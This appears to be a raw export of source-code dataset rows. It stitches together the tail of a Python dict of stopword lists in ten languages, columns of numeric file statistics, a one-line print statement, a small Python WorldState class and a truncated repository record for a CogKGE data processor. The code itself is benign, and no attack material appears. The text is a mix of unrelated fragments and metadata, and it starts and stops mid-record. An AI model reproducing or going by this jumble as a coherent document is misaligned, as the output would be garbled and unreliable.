starp",u"tad",u"tak",u"tapi",u"taps",u"tapsi",u"tapsiet",u"tapsim",u"tapt",u"tapāt",u"tapšu",u"taču",u"te",u"tiec",u"tiek",u"tiekam",u"tiekat",u"tieku",u"tik",u"tika",u"tikai",u"tiki",u"tikko",u"tiklab",u"tiklīdz",u"tiks",u"tiksiet",u"tiksim",u"tikt",u"tiku",u"tikvien",u"tikām",u"tikāt",u"tikšu",u"tomēr",u"topat",u"turpretim",u"turpretī",u"tā",u"tādēļ",u"tālab",u"tāpēc",u"un",u"uz",u"vai",u"var",u"varat",u"varēja",u"varēji",u"varēju",u"varējām",u"varējāt",u"varēs",u"varēsi",u"varēsiet",u"varēsim",u"varēt",u"varēšu",u"vien",u"virs",u"virspus",u"vis",u"viņpus",u"zem",u"ārpus",u"šaipus"],u"th":[u"กล่าว",u"กว่า",u"กัน",u"กับ",u"การ",u"ก็",u"ก่อน",u"ขณะ",u"ขอ",u"ของ",u"ขึ้น",u"คง",u"ครั้ง",u"ความ",u"คือ",u"จะ",u"จัด",u"จาก",u"จึง",u"ช่วง",u"ซึ่ง",u"ดัง",u"ด้วย",u"ด้าน",u"ตั้ง",u"ตั้งแต่",u"ตาม",u"ต่อ",u"ต่าง",u"ต่างๆ",u"ต้อง",u"ถึง",u"ถูก",u"ถ้า",u"ทั้ง",u"ทั้งนี้",u"ทาง",u"ที่",u"ที่สุด",u"ทุก",u"ทํา",u"ทําให้",u"นอกจาก",u"นัก",u"นั้น",u"นี้",u"น่า",u"นํา",u"บาง",u"ผล",u"ผ่าน",u"พบ",u"พร้อม",u"มา",u"มาก",u"มี",u"ยัง",u"รวม",u"ระหว่าง",u"รับ",u"ราย",u"ร่วม",u"ลง",u"วัน",u"ว่า",u"สุด",u"ส่ง",u"ส่วน",u"สําหรับ",u"หนึ่ง",u"หรือ",u"หลัง",u"หลังจาก",u"หลาย",u"หาก",u"อยาก",u"อยู่",u"อย่าง",u"ออก",u"อะไร",u"อาจ",u"อีก",u"เขา",u"เข้า",u"เคย",u"เฉพาะ",u"เช่น",u"เดียว",u"เดียวกัน",u"เนื่องจาก",u"เปิด",u"เปิดเผย",u"เป็น",u"เป็นการ",u"เพราะ",u"เพื่อ",u"เมื่อ",u"เรา",u"เริ่ม",u"เลย",u"เห็น",u"เอง",u"แต่",u"แบบ",u"แรก",u"และ",u"แล้ว",u"แห่ง",u"โดย",u"ใน",u"ให้",u"ได้",u"ไป",u"ไม่",u"ไว้"],u"ar":[u"،",u"أ",u"ا",u"اثر",u"اجل",u"احد",u"اخرى",u"اذا",u"اربعة",u"اطار",u"اعادة",u"اعلنت",u"اف",u"اكثر",u"اكد",u"الا",u"الاخيرة",u"الان",u"الاول",u"الاولى",u"التى",u"التي",u"الثاني",u"الثانية",u"الذاتي",u"الذى",u"الذي",u"الذين",u"السابق",u"الف",u"الماضي",u"المقبل",u"الوقت",u"الى",u"اليوم",u"اما",u"امام",u"امس",u"ان",u"انه",u"انها",u"او",u"اول",u"اي",u"ايار",u"ايام",u"ايضا",u"ب",u"باسم",u"بان",u"برس",u"بسبب",u"بشكل",u"بعد",u"بعض",u"بن"
,u"به",u"بها",u"بين",u"تم",u"ثلاثة",u"ثم",u"جميع",u"حاليا",u"حتى",u"حوالى",u"حول",u"حيث",u"حين",u"خلال",u"دون",u"ذلك",u"زيارة",u"سنة",u"سنوات",u"شخصا",u"صباح",u"صفر",u"ضد",u"ضمن",u"عام",u"عاما",u"عدة",u"عدد",u"عدم",u"عشر",u"عشرة",u"على",u"عليه",u"عليها",u"عن",u"عند",u"عندما",u"غدا",u"غير",u"ـ",u"ف",u"فان",u"فى",u"في",u"فيه",u"فيها",u"قال",u"قبل",u"قد",u"قوة",u"كان",u"كانت",u"كل",u"كلم",u"كما",u"لا",u"لدى",u"لقاء",u"لكن",u"للامم",u"لم",u"لن",u"له",u"لها",u"لوكالة",u"ما",u"مايو",u"مساء",u"مع",u"مقابل",u"مليار",u"مليون",u"من",u"منذ",u"منها",u"نحو",u"نفسه",u"نهاية",u"هذا",u"هذه",u"هناك",u"هو",u"هي",u"و",u"و6",u"واحد",u"واضاف",u"واضافت",u"واكد",u"وان",u"واوضح",u"وفي",u"وقال",u"وقالت",u"وقد",u"وقف",u"وكان",u"وكانت",u"ولا",u"ولم",u"ومن",u"وهو",u"وهي",u"يكون",u"يمكن",u"يوم"],u"bg":[u"а",u"автентичен",u"аз",u"ако",u"ала",u"бе",u"без",u"беше",u"би",u"бивш",u"бивша",u"бившо",u"бил",u"била",u"били",u"било",u"благодаря",u"близо",u"бъдат",u"бъде",u"бяха",u"в",u"вас",u"ваш",u"ваша",u"вероятно",u"вече",u"взема",u"ви",u"вие",u"винаги",u"внимава",u"време",u"все",u"всеки",u"всички",u"всичко",u"всяка",u"във",u"въпреки",u"върху",u"г",u"ги",u"главен",u"главна",u"главно",u"глас",u"го",u"година",u"години",u"годишен",u"д",u"да",u"дали",u"два",u"двама",u"двамата",u"две",u"двете",u"ден",u"днес",u"дни",u"до",u"добра",u"добре",u"добро",u"добър",u"докато",u"докога",u"дори",u"досега",u"доста",u"друг",u"друга",u"други",u"е",u"евтин",u"едва",u"един",u"една",u"еднаква",u"еднакви",u"еднакъв",u"едно",u"екип",u"ето",u"живот",u"за",u"забавям",u"зад",u"заедно",u"заради",u"засега",u"заспал",u"затова",u"защо",u"защото",u"и",u"из",u"или",u"им",u"има",u"имат",u"иска",u"й",u"каза",u"как",u"каква",u"какво",u"както",u"какъв",u"като",u"кога",u"когато",u"което",u"които",u"кой",u"който",u"колко",u"която",u"къде",u"където",u"към",u"лесен",u"лесно",u"ли",u"лош",u"м",u"май",u"малко",u"ме",u"между",u"мек",u"мен",u"месец",u"ми",u"много",u"мнозина",u"мога",u"могат",u"може",u"мокър",u"моля",u"момента",u"му",u"н",u"на",u"над",u"назад",u"най",u"направи",u"напред",u"например",u"нас",u"не",u"него",u"нещо",u"нея",u"ни",u"ние",u"никой",u"нито",u"нищо",u"но",u"нов",u"нова",u"нови",u"новина",u"някои",u"някой",u"няколко",u"няма",u"обаче",u"около",u"освен",u"особено",u"от",u"отгоре",u"отново",u"още",u"пак",u"по",u"повече",u"повечето",u"под",u"поне",u"поради",u"после",u"почти",u"прави",u"пред",u"преди",u"през",u"при",u"пък",u"първата",u"първи",u"първо",u"пъти",u"равен",u"равна",u"с",u"са",u"сам",u"само",u"се",u"сега",u"си",u"син",u"скоро",u"след",u"следващ",u"сме",u"смях",u"според",u"сред",u"срещу",u"сте",u"съм",u"със",u"също",u"т",u"т.н.",u"тази",u"така",u"такива",u"такъв",u"там",u"твой",u"те",u"тези",u"ти",u"то",u"това",u"тогава",u"този",u"той",u"толкова",u"точно",u"три",u"трябва",u"тук",u"тъй",u"тя",u"тях",u"у",u"утре",u"харесва",u"хиляди",u"ч",u"часа",u"че",u"често",u"чрез",u"ще",u"щом",u"юмрук",u"я",u"як"],u"bn":[u"অনেক",u"অন্য",u"অবশ্য",u"আগে",u"আছে",u"আজ",u"আবার",u"আমরা",u"আমাদের",u"আর",u"ই",u"উত্তর",u"উপর",u"উপরে",u"এ",u"এই",u"এক্",u"এখন",u"এত",u"এব",u"এমন",u"এমনি",u"এর",u"এস",u"এসে",u"ও",u"ওই",u"কমনে",u"করা",u"করে",u"কাছে",u"কাজ",u"কাজে",u"কারণ",u"কি",u"কিছু",u"কে",u"কেউ",u"কেখা",u"কেন",u"কোটি",u"কোনো",u"কয়েক",u"খুব",u"গিয়ে",u"গেল",u"চার",u"চালু",u"চেষ্টা",u"ছিল",u"জানা",u"জ্নজন",u"টি",u"তখন",u"তবে",u"তা",u"তাই",u"তো",u"থাকা",u"থেকে",u"দিন",u"দু",u"দুই",u"দেওয়া",u"ধামার",u"নতুন",u"না",u"নাগাদ",u"নিয়ে",u"নেওয়া",u"নয়",u"পর",u"পরে",u"পাচ",u"পি",u"পেয়্র্",u"প্রতি",u"প্রথম",u"প্রযন্ত",u"প্রাথমিক",u"প্রায়",u"বক্তব্য",u"বন",u"বলা",u"বলে",u"বলেন",
u"বহু",u"বা",u"বি",u"বিভিন্ন",u"বেশ",u"বেশি",u"মতো",u"মধ্যে",u"মনে",u"যখন",u"যদি",u"যা",u"যাওয়া",u"যে",u"র",u"রকম",u"লক্ষ",u"শুধু",u"শুরু",u"সঙ্গে",u"সব",u"সহ",u"সাধারণ",u"সামনে",u"সি",u"সে",u"সেই",u"হতে",u"হাজার",u"হয়"],u"fa":[u"آباد",u"آره",u"آری",u"آمد",u"آمده",u"آن",u"آنان",u"آنجا",u"آنكه",u"آنها",u"آنچه",u"آورد",u"آورده",u"آيد",u"آیا",u"اثرِ",u"از",u"است",u"استفاده",u"اش",u"اكنون",u"البته",u"البتّه",u"ام",u"اما",u"امروز",u"امسال",u"اند",u"انکه",u"او",u"اول",u"اي",u"ايشان",u"ايم",u"اين",u"اينكه",u"اگر",u"با",u"بار",u"بارة",u"باره",u"باشد",u"باشند",u"باشيم",u"بالا",u"بالایِ",u"بايد",u"بدون",u"بر",u"برابرِ",u"براساس",u"براي",u"برایِ",u"برخوردار",u"برخي",u"برداري",u"بروز",u"بسيار",u"بسياري",u"بعد",u"بعری",u"بعضي",u"بلكه",u"بله",u"بلکه",u"بلی",u"بنابراين",u"بندي",u"به",u"بهترين",u"بود",u"بودن",u"بودند",u"بوده",u"بي",u"بيست",u"بيش",u"بيشتر",u"بيشتري",u"بين",u"بی",u"بیرونِ",u"تا",u"تازه",u"تاكنون",u"تان",u"تحت",u"تر",u"ترين",u"تمام",u"تمامي",u"تنها",u"تواند",u"توانند",u"توسط",u"تولِ",u"تویِ",u"جا",u"جاي",u"جايي",u"جدا",u"جديد",u"جريان",u"جز",u"جلوگيري",u"جلویِ",u"حتي",u"حدودِ",u"حق",u"خارجِ",u"خدمات",u"خواست",u"خواهد",u"خواهند",u"خواهيم",u"خود",u"خويش",u"خیاه",u"داد",u"دادن",u"دادند",u"داده",u"دارد",u"دارند",u"داريم",u"داشت",u"داشتن",u"داشتند",u"داشته",u"دانست",u"دانند",u"در",u"درباره",u"دنبالِ",u"ده",u"دهد",u"دهند",u"دو",u"دوم",u"ديده",u"ديروز",u"ديگر",u"ديگران",u"ديگري",u"دیگر",u"را",u"راه",u"رفت",u"رفته",u"روب",u"روزهاي",u"روي",u"رویِ",u"ريزي",u"زياد",u"زير",u"زيرا",u"زیرِ",u"سابق",u"ساخته",u"سازي",u"سراسر",u"سریِ",u"سعي",u"سمتِ",u"سوم",u"سوي",u"سویِ",u"سپس",u"شان",u"شايد",u"شد",u"شدن",u"شدند",u"شده",u"شش",u"شما",u"شناسي",u"شود",u"شوند",u"صورت",u"ضدِّ",u"ضمن",u"طبقِ",u"طريق",u"طور",u"طي",u"عقبِ",u"علّتِ",u"عنوانِ",u"غير",u"فقط",u"فكر",u"فوق",u"قابل",u"قبل",u"قصدِ",u"كرد",u"كردم",u"كردن",u"كردند",u"كرده",u"كسي",u"كل",u"كمتر",u"كند",u"كنم",u"كنند",u"كنيد",u"كنيم",u"كه",u"لطفاً",u"ما",u"مان",u"مانند",u"مانندِ",u"مثل",u"مثلِ",u"مختلف",u"مدّتی",u"مردم",u"مرسی",u"مقابل",u"من",u"مورد",u"مي",u"ميليارد",u"ميليون",u"مگر",u"ناشي",u"نام",u"نبايد",u"نبود",u"نخست",u"نخستين",u"نخواهد",u"ندارد",u"ندارند",u"نداشته",u"نزديك",u"نزدِ",u"نزدیکِ",u"نشان",u"نشده",u"نظير",u"نكرده",u"نمايد",u"نمي",u"نه",u"نوعي",u"نيز",u"نيست",u"ها",u"هاي",u"هايي",u"هر",u"هرگز",u"هزار",u"هست",u"هستند",u"هستيم",u"هفت",u"هم",u"همان",u"همه",u"همواره",u"همين",u"همچنان",u"همچنين",u"همچون",u"همین",u"هنوز",u"هنگام",u"هنگامِ",u"هنگامی",u"هيچ",u"هیچ",u"و",u"وسطِ",u"وقتي",u"وقتیکه",u"ولی",u"وي",u"وگو",u"يا",u"يابد",u"يك",u"يكديگر",u"يكي",u"ّه",u"پاعینِ",u"پس",u"پنج",u"پيش",u"پیش",u"پیشِ",u"چرا",u"چطور",u"چند",u"چندین",u"چنين",u"چه",u"چهار",u"چون",u"چيزي",u"چگونه",u"چیز",u"چیزی",u"چیست",u"کجا",u"کجاست",u"کدام",u"کس",u"کسی",u"کنارِ",u"که",u"کَی",u"کی",u"گذاري",u"گذاشته",u"گردد",u"گرفت",u"گرفته",u"گروهي",u"گفت",u"گفته",u"گويد",u"گويند",u"گيرد",u"گيري",u"یا",u"یک"],u"hi":[u"अंदर",u"अत",u"अदि",u"अप",u"अपना",u"अपनि",u"अपनी",u"अपने",u"अभि",u"अभी",u"आदि",u"आप",u"इंहिं",u"इंहें",u"इंहों",u"इतयादि",u"इत्यादि",u"इन",u"इनका",u"इन्हीं",u"इन्हें",u"इन्हों",u"इस",u"इसका",u"इसकि",u"इसकी",u"इसके",u"इसमें",u"इसि",u"इसी",u"इसे",u"उंहिं",u"उंहें",u"उंहों",u"उन",u"उनका",u"उनकि",u"उनकी",u"उनके",u"उनको",u"उन्हीं",u"उन्हें",u"उन्हों",u"उस",u"उसके",u"उसि",u"उसी",u"उसे",u"एक",u"एवं",u"एस",u"एसे",u"ऐसे",u"ओर",u"और",u"कइ",u"कई",u"कर",u"करता",u"करते",u"करना",u"करने",u"करें",u"कहते",u"कहा",u"का",u"काफि",u"काफ़ी",u"कि",u"किंहें",u"किंहों",u"कितना",u"किन्हें",u"किन्हों",u"किया",u"किर",u"किस",u"किसि",u"किसी",u"किसे",u"की",u"कुछ",u"कुल",u"के",u"को",u"कोइ",u"कोई",u"कोन",u"क
ोनसा",u"कौन",u"कौनसा",u"गया",u"घर",u"जब",u"जहाँ",u"जहां",u"जा",u"जिंहें",u"जिंहों",u"जितना",u"जिधर",u"जिन",u"जिन्हें",u"जिन्हों",u"जिस",u"जिसे",u"जीधर",u"जेसा",u"जेसे",u"जैसा",u"जैसे",u"जो",u"तक",u"तब",u"तरह",u"तिंहें",u"तिंहों",u"तिन",u"तिन्हें",u"तिन्हों",u"तिस",u"तिसे",u"तो",u"था",u"थि",u"थी",u"थे",u"दबारा",u"दवारा",u"दिया",u"दुसरा",u"दुसरे",u"दूसरे",u"दो",u"द्वारा",u"न",u"नहिं",u"नहीं",u"ना",u"निचे",u"निहायत",u"नीचे",u"ने",u"पर",u"पहले",u"पुरा",u"पूरा",u"पे",u"फिर",u"बनि",u"बनी",u"बहि",u"बही",u"बहुत",u"बाद",u"बाला",u"बिलकुल",u"भि",u"भितर",u"भी",u"भीतर",u"मगर",u"मानो",u"मे",u"में",u"यदि",u"यह",u"यहाँ",u"यहां",u"यहि",u"यही",u"या",u"यिह",u"ये",u"रखें",u"रवासा",u"रहा",u"रहे",u"ऱ्वासा",u"लिए",u"लिये",u"लेकिन",u"व",u"वगेरह",u"वरग",u"वर्ग",u"वह",u"वहाँ",u"वहां",u"वहिं",u"वहीं",u"वाले",u"वुह",u"वे",u"वग़ैरह",u"संग",u"सकता",u"सकते",u"सबसे",u"सभि",u"सभी",u"साथ",u"साबुत",u"साभ",u"सारा",u"से",u"सो",u"हि",u"ही",u"हुअ",u"हुआ",u"हुइ",u"हुई",u"हुए",u"हे",u"हें",u"है",u"हैं",u"हो",u"होता",u"होति",u"होती",u"होते",u"होना",u"होने"],u"mr":[u"अधिक",u"अनेक",u"अशी",u"असलयाचे",u"असलेल्या",u"असा",u"असून",u"असे",u"आज",u"आणि",u"आता",u"आपल्या",u"आला",u"आली",u"आले",u"आहे",u"आहेत",u"एक",u"एका",u"कमी",u"करणयात",u"करून",u"का",u"काम",u"काय",u"काही",u"किवा",u"की",u"केला",u"केली",u"केले",u"कोटी",u"गेल्या",u"घेऊन",u"जात",u"झाला",u"झाली",u"झाले",u"झालेल्या",u"टा",u"डॉ",u"तर",u"तरी",u"तसेच",u"ता",u"ती",u"तीन",u"ते",u"तो",u"त्या",u"त्याचा",u"त्याची",u"त्याच्या",u"त्याना",u"त्यानी",u"त्यामुळे",u"त्री",u"दिली",u"दोन",u"न",u"नाही",u"निर्ण्य",u"पण",u"पम",u"परयतन",u"पाटील",u"म",u"मात्र",u"माहिती",u"मी",u"मुबी",u"म्हणजे",u"म्हणाले",u"म्हणून",u"या",u"याचा",u"याची",u"याच्या",u"याना",u"यानी",u"येणार",u"येत",u"येथील",u"येथे",u"लाख",u"व",u"व्यकत",u"सर्व",u"सागित्ले",u"सुरू",u"हजार",u"हा",u"ही",u"हे",u"होणार",u"होत",u"होता",u"होती",u"होते"],u"ro":[u"acea",u"aceasta",u"această",u"aceea",u"acei",u"aceia",u"acel",u"acela",u"acele",u"acelea",u"acest",u"acesta",u"aceste",u"acestea",u"aceşti",u"aceştia",u"acolo",u"acord",u"acum",u"ai",u"aia",u"aibă",u"aici",u"al",u"ale",u"alea",u"altceva",u"altcineva",u"am",u"ar",u"are",u"asemenea",u"asta",u"astea",u"astăzi",u"asupra",u"au",u"avea",u"avem",u"aveţi",u"azi",u"aş",u"aşadar",u"aţi",u"bine",u"bucur",u"bună",u"ca",u"care",u"caut",u"ce",u"cel",u"ceva",u"chiar",u"cinci",u"cine",u"cineva",u"contra",u"cu",u"cum",u"cumva",u"curând",u"curînd",u"când",u"cât",u"câte",u"câtva",u"câţi",u"cînd",u"cît",u"cîte",u"cîtva",u"cîţi",u"că",u"căci",u"cărei",u"căror",u"cărui",u"către",u"da",u"dacă",u"dar",u"datorită",u"dată",u"dau",u"de",u"deci",u"deja",u"deoarece",u"departe",u"deşi",u"din",u"dinaintea",u"dintr-",u"dintre",u"doi",u"doilea",u"două",u"drept",u"după",u"dă",u"ea",u"ei",u"el",u"ele",u"eram",u"este",u"eu",u"eşti",u"face",u"fata",u"fi",u"fie",u"fiecare",u"fii",u"fim",u"fiu",u"fiţi",u"frumos",u"fără",u"graţie",u"halbă",u"iar",u"ieri",u"la",u"le",u"li",u"lor",u"lui",u"lângă",u"lîngă",u"mai",u"mea",u"mei",u"mele",u"mereu",u"meu",u"mi",u"mie",u"mine",u"mult",u"multă",u"mulţi",u"mulţumesc",u"mâine",u"mîine",u"mă",u"ne",u"nevoie",u"nici",u"nicăieri",u"nimeni",u"nimeri",u"nimic",u"nişte",u"noastre",u"noastră",u"noi",u"noroc",u"nostru",u"nouă",u"noştri",u"nu",u"opt",u"ori",u"oricare",u"orice",u"oricine",u"oricum",u"oricând",u"oricât",u"oricînd",u"oricît",u"oriunde",u"patra",u"patru",u"patrulea",u"pe",u"pentru",u"peste",u"pic",u"poate",u"pot",u"prea",u"prima",u"primul",u"prin",u"printr-",u"puţin",u"puţina",u"puţină",u"până",u"pînă",u"rog",u"sa",u"sale",u"sau",u"se",u"spate",u"spre",u"sub",u"sunt",u"suntem",u"sunteţi",u
"sută",u"sînt",u"sîntem",u"sînteţi",u"să",u"săi",u"său",u"ta",u"tale",u"te",u"timp",u"tine",u"toate",u"toată",u"tot",u"totuşi",u"toţi",u"trei",u"treia",u"treilea",u"tu",u"tăi",u"tău",u"un",u"una",u"unde",u"undeva",u"unei",u"uneia",u"unele",u"uneori",u"unii",u"unor",u"unora",u"unu",u"unui",u"unuia",u"unul",u"vi",u"voastre",u"voastră",u"voi",u"vostru",u"vouă",u"voştri",u"vreme",u"vreo",u"vreun",u"vă",u"zece",u"zero",u"zi",u"zice",u"îi",u"îl",u"îmi",u"împotriva",u"în",u"înainte",u"înaintea",u"încotro",u"încât",u"încît",u"între",u"întrucât",u"întrucît",u"îţi",u"ăla",u"ălea",u"ăsta",u"ăstea",u"ăştia",u"şapte",u"şase",u"şi",u"ştiu",u"ţi",u"ţie"],u"en":[u"a",u"a's",u"able",u"about",u"above",u"according",u"accordingly",u"across",u"actually",u"after",u"afterwards",u"again",u"against",u"ain't",u"all",u"allow",u"allows",u"almost",u"alone",u"along",u"already",u"also",u"although",u"always",u"am",u"among",u"amongst",u"an",u"and",u"another",u"any",u"anybody",u"anyhow",u"anyone",u"anything",u"anyway",u"anyways",u"anywhere",u"apart",u"appear",u"appreciate",u"appropriate",u"are",u"aren't",u"around",u"as",u"aside",u"ask",u"asking",u"associated",u"at",u"available",u"away",u"awfully",u"b",u"be",u"became",u"because",u"become",u"becomes",u"becoming",u"been",u"before",u"beforehand",u"behind",u"being",u"believe",u"below",u"beside",u"besides",u"best",u"better",u"between",u"beyond",u"both",u"brief",u"but",u"by",u"c",u"c'mon",u"c's",u"came",u"can",u"can't",u"cannot",u"cant",u"cause",u"causes",u"certain",u"certainly",u"changes",u"clearly",u"co",u"com",u"come",u"comes",u"concerning",u"consequently",u"consider",u"considering",u"contain",u"containing",u"contains",u"corresponding",u"could",u"couldn't",u"course",u"currently",u"d",u"definitely",u"described",u"despite",u"did",u"didn't",u"different",u"do",u"does",u"doesn't",u"doing",u"don't",u"done",u"down",u"downwards",u"during",u"e",u"each",u"edu",u"eg",u"eight",u"either",u"else",u"elsewhere",u"enough",u"entirely",u"especially",u"et",u"etc",u"even",u"ever",u"every",u"everybody",u"everyone",u"everything",u"everywhere",u"ex",u"exactly",u"example",u"except",u"f",u"far",u"few",u"fifth",u"first",u"five",u"followed",u"following",u"follows",u"for",u"former",u"formerly",u"forth",u"four",u"from",u"further",u"furthermore",u"g",u"get",u"gets",u"getting",u"given",u"gives",u"go",u"goes",u"going",u"gone",u"got",u"gotten",u"greetings",u"h",u"had",u"hadn't",u"happens",u"hardly",u"has",u"hasn't",u"have",u"haven't",u"having",u"he",u"he's",u"hello",u"help",u"hence",u"her",u"here",u"here's",u"hereafter",u"hereby",u"herein",u"hereupon",u"hers",u"herself",u"hi",u"him",u"himself",u"his",u"hither",u"hopefully",u"how",u"howbeit",u"however",u"i",u"i'd",u"i'll",u"i'm",u"i've",u"ie",u"if",u"ignored",u"immediate",u"in",u"inasmuch",u"inc",u"indeed",u"indicate",u"indicated",u"indicates",u"inner",u"insofar",u"instead",u"into",u"inward",u"is",u"isn't",u"it",u"it'd",u"it'll",u"it's",u"its",u"itself",u"j",u"just",u"k",u"keep",u"keeps",u"kept",u"know",u"known",u"knows",u"l",u"last",u"lately",u"later",u"latter",u"latterly",u"least",u"less",u"lest",u"let",u"let's",u"like",u"liked",u"likely",u"little",u"look",u"looking",u"looks",u"ltd",u"m",u"mainly",u"many",u"may",u"maybe",u"me",u"mean",u"meanwhile",u"merely",u"might",u"more",u"moreover",u"most",u"mostly",u"much",u"must",u"my",u"myself",u"n",u"name",u"namely",u"nd",u"near",u"nearly",u"necessary",u"need",u"needs",u"neither",u"never",u"nevertheless",u"new",u"next",u"nine",u"no",u"nobody",u"non",u"none",u"noone",u"nor",u"normally",u"not",u"nothing",u"novel",u"now",
u"nowhere",u"o",u"obviously",u"of",u"off",u"often",u"oh",u"ok",u"okay",u"old",u"on",u"once",u"one",u"ones",u"only",u"onto",u"or",u"other",u"others",u"otherwise",u"ought",u"our",u"ours",u"ourselves",u"out",u"outside",u"over",u"overall",u"own",u"p",u"particular",u"particularly",u"per",u"perhaps",u"placed",u"please",u"plus",u"possible",u"presumably",u"probably",u"provides",u"q",u"que",u"quite",u"qv",u"r",u"rather",u"rd",u"re",u"really",u"reasonably",u"regarding",u"regardless",u"regards",u"relatively",u"respectively",u"right",u"s",u"said",u"same",u"saw",u"say",u"saying",u"says",u"second",u"secondly",u"see",u"seeing",u"seem",u"seemed",u"seeming",u"seems",u"seen",u"self",u"selves",u"sensible",u"sent",u"serious",u"seriously",u"seven",u"several",u"shall",u"she",u"should",u"shouldn't",u"since",u"six",u"so",u"some",u"somebody",u"somehow",u"someone",u"something",u"sometime",u"sometimes",u"somewhat",u"somewhere",u"soon",u"sorry",u"specified",u"specify",u"specifying",u"still",u"sub",u"such",u"sup",u"sure",u"t",u"t's",u"take",u"taken",u"tell",u"tends",u"th",u"than",u"thank",u"thanks",u"thanx",u"that",u"that's",u"thats",u"the",u"their",u"theirs",u"them",u"themselves",u"then",u"thence",u"there",u"there's",u"thereafter",u"thereby",u"therefore",u"therein",u"theres",u"thereupon",u"these",u"they",u"they'd",u"they'll",u"they're",u"they've",u"think",u"third",u"this",u"thorough",u"thoroughly",u"those",u"though",u"three",u"through",u"throughout",u"thru",u"thus",u"to",u"together",u"too",u"took",u"toward",u"towards",u"tried",u"tries",u"truly",u"try",u"trying",u"twice",u"two",u"u",u"un",u"under",u"unfortunately",u"unless",u"unlikely",u"until",u"unto",u"up",u"upon",u"us",u"use",u"used",u"useful",u"uses",u"using",u"usually",u"uucp",u"v",u"value",u"various",u"very",u"via",u"viz",u"vs",u"w",u"want",u"wants",u"was",u"wasn't",u"way",u"we",u"we'd",u"we'll",u"we're",u"we've",u"welcome",u"well",u"went",u"were",u"weren't",u"what",u"what's",u"whatever",u"when",u"whence",u"whenever",u"where",u"where's",u"whereafter",u"whereas",u"whereby",u"wherein",u"whereupon",u"wherever",u"whether",u"which",u"while",u"whither",u"who",u"who's",u"whoever",u"whole",u"whom",u"whose",u"why",u"will",u"willing",u"wish",u"with",u"within",u"without",u"won't",u"wonder",u"would",u"wouldn't",u"x",u"y",u"yes",u"yet",u"you",u"you'd",u"you'll",u"you're",u"you've",u"your",u"yours",u"yourself",u"yourselves",u"z",u"zero"]}
| 8,068.714286
| 112,534
| 0.63964
| 27,469
| 112,962
| 2.658997
| 0.402344
| 0.002848
| 0.003368
| 0.003341
| 0.053916
| 0.023289
| 0.022043
| 0.012746
| 0.012527
| 0.006079
| 0
| 0.000293
| 0.001824
| 112,962
| 13
| 112,535
| 8,689.384615
| 0.640436
| 0.000912
| 0
| 0
| 0
| 2.25
| 0.649119
| 0.365785
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.125
| 0.375
| 0
| 0.375
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
f937303cbe2bd1ca99e6bfd681984ef1eb1f4844
| 35
|
py
|
Python
|
first-homework.py
|
Hexotical/Astr119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | null | null | null |
first-homework.py
|
Hexotical/Astr119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | 2
|
2020-10-01T18:51:01.000Z
|
2020-10-06T14:15:37.000Z
|
first-homework.py
|
Hexotical/astr-119
|
34a638d29f33c8fde9245cd7c5869bf3f9e7366b
|
[
"MIT"
] | null | null | null |
print("Lukas Ho, pronouns: he/him")
| 35
| 35
| 0.714286
| 6
| 35
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 35
| 1
| 35
| 35
| 0.78125
| 0
| 0
| 0
| 0
| 0
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
f97b2f6c294156a507ee4e398ae4a7d90fba5ed9
| 240
|
py
|
Python
|
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
world_state.py
|
puskini33/Calculator
|
79cc0021e8c9b5235d6c57c2d721deb254d73a33
|
[
"MIT"
] | null | null | null |
class WorldState(object):
    def __init__(self):
        self.variables = {}

    def clone(self):
        # Copy the mapping so the clone owns its own state; assigning
        # self.variables directly would alias the original's dict, and
        # mutations on the "clone" would leak back into the source.
        temporary_world_state = WorldState()
        temporary_world_state.variables = dict(self.variables)
        return temporary_world_state
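A minimal check of the intended copy semantics (a sketch, not part of the original row):

# Sketch: mutating the clone must not affect the original.
ws = WorldState()
ws.variables["x"] = 1
snapshot = ws.clone()
snapshot.variables["x"] = 2
assert ws.variables["x"] == 1  # holds because clone() copies the dict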
| 24
| 56
| 0.675
| 25
| 240
| 6.08
| 0.48
| 0.276316
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.245833
| 240
| 9
| 57
| 26.666667
| 0.839779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0
| 0.571429
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
f99c7dc6ce29a2ffb9fe2abe6759971a3c9cf033
| 214
|
py
|
Python
|
cogkge/data/processor/fb15k237processor.py
|
jinzhuoran/CogKGE
|
b0e819a1d34cf61a7d70c33808da3377b73c8fd6
|
[
"MIT"
] | 18
|
2022-01-22T09:52:57.000Z
|
2022-03-22T15:02:12.000Z
|
cogkge/data/processor/fb15k237processor.py
|
CogNLP/CogKGE
|
70d851d6489600c1e90eb25b0388a3ceba2f078c
|
[
"MIT"
] | null | null | null |
cogkge/data/processor/fb15k237processor.py
|
CogNLP/CogKGE
|
